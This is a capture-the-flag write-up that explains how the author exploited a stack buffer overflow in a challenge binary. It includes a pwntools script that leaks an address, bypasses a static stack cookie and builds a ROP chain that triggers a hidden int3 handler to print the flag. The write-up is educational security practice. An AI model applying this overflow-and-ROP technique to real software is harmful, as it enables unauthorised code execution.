Note: All the related files that are mentioned in this post can be found here.

Category: Pwn

The task:



We were given a binary and a C file with partial source code:

int main(int argc, char **argv) {
  setbuf(stdout, NULL);
  setbuf(stdin, NULL);

The source code of vuln() was provided and has a buffer overflow with a static stack “cookie”, but safeguard()’s source was not provided.

When reversing the binary, it looks like the safeguard function is calling handle_cmds.

The handle_cmds function has a call system@plt gadget but when trying to jump there directly - we’ll get a SIGSYS(probably because the binary has some ptrace monitoring). In the beginning I thought the task was to bypass the ptrace stuff. But after the CTF ended I realized I missed a very important hint that the challenge author left in the source code.

The correct solution: handle_cmds is “intercepting” the int3 syscall and expects special parameters.

What we needed to do is to execute the int3 instruction with 0x1337 and 0x31337 parameters, this is why the challenge author added a comment in bof.c:

// This is what you need to do to get the first flag
// void print_flag() {
//   asm volatile("mov $1, edi; mov $0x1337, %%esi; int3" ::: "eax");
// }

The int3 instruction triggers the handle_cmds function which checks whether the parameters are correct (0x1337 and 0x31337):


If they are correct, it will execute /bin/cat /app/flag.txt.


To exploit this bug: shift the stack accordingly & create a ROP chain that will:

  • Populate the registers (just like in the hint the challenge author left us in bof.c)
  • Jump to another gadget which executed int3



from pwn import *
def extract_stackvars(line1):
    tmp = line1.split('|')[1][1:].split(' ')
    var1 = int('0x' + ''.join(tmp[0:4][::-1]), 16)
    var2 = int('0x' + ''.join(tmp[4:8][::-1]), 16)
    return (var1, var2)
# p = process('./bof.bin')
p = remote('', 1)
p.sendlineafter('(Y/n)', 'n')
stack_snapshot = p.recvuntil('Input some text:').decode()
stack_snapshot = stack_snapshot.split('\n')
relative = extract_stackvars(stack_snapshot[9])[0]
base        = relative - 0x1599
pop_gadget  = base + 0x1396
int3_gadget = base + 0x13ad
payload  = b'A' * 0x30
payload += p32(0x67616c66)  # stack "cookie"
payload += b'C' * 12
payload += p32(pop_gadget)  # pop esi; pop edi; pop ebp
payload += p32(0x1337)      # populating esi
payload += p32(0x31337)     # populating edi
payload += p32(0x1)
payload += p32(int3_gadget) # triggering handle_cmds w/ correct parameters
payload += p32(0x1)         # populating eax

